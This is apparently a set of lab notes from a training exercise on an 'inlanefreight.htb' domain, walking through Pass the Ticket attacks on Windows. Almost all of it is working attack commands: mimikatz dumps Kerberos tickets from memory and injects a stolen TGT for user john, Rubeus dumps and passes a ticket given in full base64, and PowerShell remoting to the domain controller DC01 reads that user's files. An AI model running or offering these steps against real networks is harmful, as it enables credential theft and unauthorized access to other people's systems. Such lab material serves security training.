Pass the Ticket (PtT) from Windows
June 11, 2024
Last updated
June 11, 2024
Last updated
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
exit
# Then
dir *.kirbiNow we can perform pass the ticket
cd C:\tools
mimikatz.exe
privilege::debug
# We are selecting john ticket to get access to john files
# Just copy the john tgt from above
kerberos::ptt "C:\tools\[0;50629]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"
exitFirst we have to enter powershell
Then we can access the DC01
powershell
Enter-PSSession -ComputerName DC01
whoami
hostname
dir \\DC01.inlanefreight.htb\john
more \\DC01.inlanefreight.htb\john\john.txtORRRRR FASTER WAY TO VIEW THE .txt FILE
# After you exited from the mimikatz
# You can now directly view it
more \\DC01.inlanefreight.htb\john\john.txtTo read the john.txt in john directory
# First we have to connect to DC01
powershell
Enter-PSSession -ComputerName DC01
cd C:\john
dir
more john.txtNow we are going to try rubues.exe
Rubeus.exe dump /nowrapRubeus.exe ptt /ticket:doIFqDCCBaSgAwIBBaEDAgEWooIEojCCBJ5hggSaMIIElqADAgEFoRMbEUlOTEFORUZSRUlHSFQuSFRCoiYwJKADAgECoR0wGxsGa3JidGd0GxFJTkxBTkVGUkVJR0hULkhUQqOCBFAwggRMoAMCARKhAwIBAqKCBD4EggQ6esRMTocuikUkpg/PZK0uVC7ojIIiDZKZBFs1u53oP6KhbK85HrfTyuf6Jy/eNcc02gwUh4jk9U7soafnYAcofU8nYGdo+YXhL4zGSJZ1oEontl4Kcc9LX5z2VIu5R8yMQ8GFNAwJvJn4ELmnK46siGMr6KdTEHdyzZx1b9K6Xd3UrU03iqJSl5qNebu1krKA8knXIznpwLicItUunZulTZdz4q8oRYcy5nZbkUb8yPcrJnQJrpuhPPdcy+/lqZ50YmuW3HwixwydhqBJU9bQth/d4/amMoqdPQdmndufrmfzJFgDOXNlzn4uGnNOj7plf1c7UCD3zAokDPtUd1qU4IE5/LaJ/Dz0vy8JOIPKOQm5cZBVrUs9miPX8wS3qRATTLCUvtncv3RxMKVrNtzphdn9FxaK4SRZaXA4BIqYN7yWHnHRA/y2qnW5TSAOuzLfA1wp0J2uw5Id7b9tC47h1kjJO3m1hkgfMNvj19NJe9/qosJz4hCvXxcl5R666C8MNDNXLqfUZrQJW48pvur9M9l4LMrQsMd+BFBPvMEI6cgoZxBoZoLxxc+DvE9jolY4f7UyYk+ny/wrdVIhZ4mwm/1Fgd5SN9KqEs4mzV1T9J/0jvGiPD6Lx/GRAbZcVyHz3uRASRX0XwpdddRKmVXTafc1uUbbtdsF+FRp4aiNaG84GRj3tM47h8hFmC7reqZ7NXUYFM6Ng70NH4co4avHDodzsFW+W2mM3tBOrF7mVia5ahcV3FUeKuBurYVuyt10AFSakuv6cYc2FKeDVG/G/r/zrWQsyMfBW2IWNVIEYiaG1SIYfpXrDD+afKIqpKdqAfycFp13OWUmt5FHjvKorEG7UmPeuE762yZOnqRvAAni6wcYNmbHdd9a/aoH8qaPAl9Ek32UXXXSTt6ZDDkyGi0n8lB/faSATTzcVPmjvTcl40of9ni3isdkjTCv1PA3U7dKtVR9MD0qmJxIXarZmbZu0oeTmB5piIBRKNOHWdZIflSYVHpEfxlCPR976x6x7kWo7DSyCjGjIb2EX2oMwUnpVN/JP4iuodKlOL3TlA5VwMa5JD7UHYbq4vrEP5NPxhmsN1utMl3oS5b1pJZP3Inf6tsbusO+ifh6k3eVL7SH35h9YAzltkfG2SRq/xw4/aN4JHIiKrbvtCsqMyAQndfCKNnQTBB4MvO3nevoOuCWtDgaIKTOF9M90RzCRCkP1zB56W+nfMaKhBGpZMaCbAlZZ6kw6JDnvyOSXC0sqQbBKrPJrpC4gI1P6ZjiNNwtec/X1mlAC/DiDCt7Uy/pMNLHD3nFSd+uVDgAz/5eGcFYU++LeltkpOWVf6FUR+ZEz+z60i4ENj4WuajBAKg22Duy5rw+eEFjUlokT3h1B4PRy3VScqTytJXH/igFg1M9NZflEADBr2bCtwOQ8XF1NIb8H8gX7swkbQWjgfEwge6gAwIBAKKB5gSB432B4DCB3aCB2jCB1zCB1KArMCmgAwIBEqEiBCDjcb9/z3WmEcYBV6i95Drsuv74vD6kwLK57FRnusmbCqETGxFJTkxBTkVGUkVJR0hULkhUQqIRMA+gAwIBAaEIMAYbBGpvaG6jBwMFAEDhAAClERgPMjAyNDA2MTEwNjE0MzFaphEYDzIwMjQwNjExMTYxNDMxWqcRGA8yMDI0MDYxODA2MTQzMVqoExsRSU5MQU5FRlJFSUdIVC5IVEKpJjAkoAMCAQKhHTAbGwZrcmJ0Z3QbEUlOTEFORUZSRUlHSFQuSFRCNow we can view the files from dc01 john
dir \\DC01.inlanefreight.htb\john
more \\DC01.inlanefreight.htb\john\john.txtWe can also connect via powershell
powershell
Enter-PSSession -ComputerName DC01
whoami
hostname
more C:\john\john.txtYou could also do it like this
# First we have to get the .kirbi file from mimikatz
# Then we will just use ptt options of rebeus
Rubeus.exe ptt /ticket:[0;50629]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi
# Then we can now read the john.txt from dc01
more \\DC01.inlanefreight.htb\john\john.txt
